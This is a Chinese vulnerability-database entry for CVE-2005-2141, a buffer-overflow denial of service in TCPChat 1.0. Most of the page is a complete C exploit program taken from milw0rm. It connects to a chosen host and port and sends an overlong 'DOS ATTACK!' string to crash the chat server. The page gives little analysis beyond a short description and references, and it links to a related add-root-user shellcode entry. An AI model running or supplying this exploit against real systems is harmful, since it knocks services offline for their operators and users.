TCPChat 拒绝服务漏洞
漏洞ID | 1108920 | 漏洞类型 | 缓冲区溢出 |
发布时间 | 2005-07-06 | 更新时间 | 2005-07-06 |
CVE编号 | CVE-2005-2141 |
CNNVD-ID | CNNVD-200507-001 |
漏洞平台 | Windows | CVSS评分 | 5.0 |
|漏洞来源
|漏洞详情
TCPChat是一款小巧到聊天程序。TCPChat1.0中存在拒绝服务漏洞。远程攻击者可通过发送超长的聊天字符串,可能触发缓冲区溢出,导致程序崩溃,产生拒绝服务。
|漏洞EXP
/*
TCP Chat(TCPX) DoS Exploit
----------------------------------------
Resolve host... [OK]
[+] Connecting... [OK]
Target locked
Sending bad procedure... [OK]
[+] Server DoS'ed
Tested on Windows2000 SP4
Info: infamous.2hell.com / [email protected]
*/
#include <string.h>
#include <winsock2.h>
#include <stdio.h>
#pragma comment(lib, "ws2_32.lib")
char doscore[] =
"*** TCP Chat 1.0 DOS Exploit n"
"***-----------------------------------------------n"
"*** Infam0us Gr0up - Securiti Research Team nn"
"***DOS ATTACK! DOS ATTACK! DOS ATTACK! DOS ATTACK!n"
"***DOS ATTACK! DOS ATTACK! DOS ATTACK! DOS ATTACK!n"
"***DOS ATTACK! DOS ATTACK! DOS ATTACK! DOS ATTACK!n"
"***DOS ATTACK! DOS ATTACK! DOS ATTACK! DOS ATTACK!n"
"***DOS ATTACK! DOS ATTACK! DOS ATTACK! DOS ATTACK!n"
"***DOS ATTACK! DOS ATTACK! DOS ATTACK! DOS ATTACK!n"
"***DOS ATTACK! DOS ATTACK! DOS ATTACK! DOS ATTACK!n"
"***DOS ATTACK! DOS ATTACK! DOS ATTACK! DOS ATTACK!n"
"***DOS ATTACK! DOS ATTACK! DOS ATTACK! DOS ATTACK!n"
"***DOS ATTACK! DOS ATTACK! DOS ATTACK! DOS ATTACK!n"
"***DOS ATTACK! DOS ATTACK! DOS ATTACK! DOS ATTACK!n"
"***DOS ATTACK! DOS ATTACK! DOS ATTACK! DOS ATTACK!n"
"***DOS ATTACK! DOS ATTACK! DOS ATTACK! DOS ATTACK!n"
"***DOS ATTACK! DOS ATTACK! DOS ATTACK! DOS ATTACK!n"
"***DOS ATTACK! DOS ATTACK! DOS ATTACK! DOS ATTACK!n"
"***DOS ATTACK! DOS ATTACK! DOS ATTACK! DOS ATTACK!n"
"***DOS ATTACK! DOS ATTACK! DOS ATTACK! DOS ATTACK!n"
"***DOS ATTACK! DOS ATTACK! DOS ATTACK! DOS ATTACK!n"
"***DOS ATTACK! DOS ATTACK! DOS ATTACK! DOS ATTACK!n"
"***DOS ATTACK! DOS ATTACK! DOS ATTACK! DOS ATTACK!n";
int main(int argc, char *argv[])
{
WSADATA wsaData;
WORD wVersionRequested;
struct hostent *pTarget;
struct sockaddr_in sock;
char *target;
int port,bufsize;
SOCKET inetdos;
if (argc < 2)
{
printf(" TCP Chat(TCPX) DoS Exploit n", argv[0]);
printf(" ------------------------------------------n", argv[0]);
printf(" Infam0us Gr0up - Securiti Researchnn", argv[0]);
printf("[-]Usage: %s [target] [port]n", argv[0]);
printf("[?]Exam: %s localhost 1234n", argv[0]);
exit(1);
}
wVersionRequested = MAKEWORD(1, 1);
if (WSAStartup(wVersionRequested, &wsaData) < 0) return -1;
target = argv[1];
port = 1234;
if (argc >= 3) port = atoi(argv[2]);
bufsize = 1024;
if (argc >= 4) bufsize = atoi(argv[3]);
inetdos = socket(AF_INET, SOCK_STREAM, 0);
if(inetdos==INVALID_SOCKET)
{
printf("Socket ERROR n");
exit(1);
}
printf(" TCP Chat(TCPX) DoS Exploit n", argv[0]);
printf(" ------------------------------------------rnn", argv[0]);
printf("Resolve host... ");
if ((pTarget = gethostbyname(target)) == NULL)
{
printf("FAILED n", argv[0]);
exit(1);
}
printf("[OK]n ");
memcpy(&sock.sin_addr.s_addr, pTarget->h_addr, pTarget->h_length);
sock.sin_family = AF_INET;
sock.sin_port = htons((USHORT)port);
printf("[+] Connecting... ");
if ( (connect(inetdos, (struct sockaddr *)&sock, sizeof (sock) )))
{
printf("FAILEDn");
exit(1);
}
printf("[OK]n");
printf("Target lockedn");
printf("Sending bad procedure... ");
if (send(inetdos, doscore, sizeof(doscore)-1, 0) == -1)
{
printf("ERRORn");
closesocket(inetdos);
exit(1);
}
printf("[OK]n ");
printf("[+] Server DoS'edn");
closesocket(inetdos);
WSACleanup();
return 0;
}
// milw0rm.com [2005-07-06]
|受影响的产品
Jollybox.De Tcp Chat 1.0
|参考资料
来源:SECTRACK
名称:1014371
链接:http://securitytracker.com/id?1014371
来源:MISC
链接:http://k.domaindlx.com/shellcore/advisories.asp?bug_report=display&infamous;_group=65
来源:MISC
链接:http://addict3d.org/index.php?page=viewarticle&type;=security&ID;=4377
相关推荐: Linux/x86 – Add Root User Shellcode (104 bytes)
Linux/x86 – Add Root User Shellcode (104 bytes) 漏洞ID 1054606 漏洞类型 发布时间 2004-09-12 更新时间 2004-09-12 CVE编号 N/A CNNVD-ID N/A 漏洞平台 Linu…
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
喜欢就支持一下吧
恐龙抗狼扛1年前0
kankan啊啊啊啊3年前0
66666666666666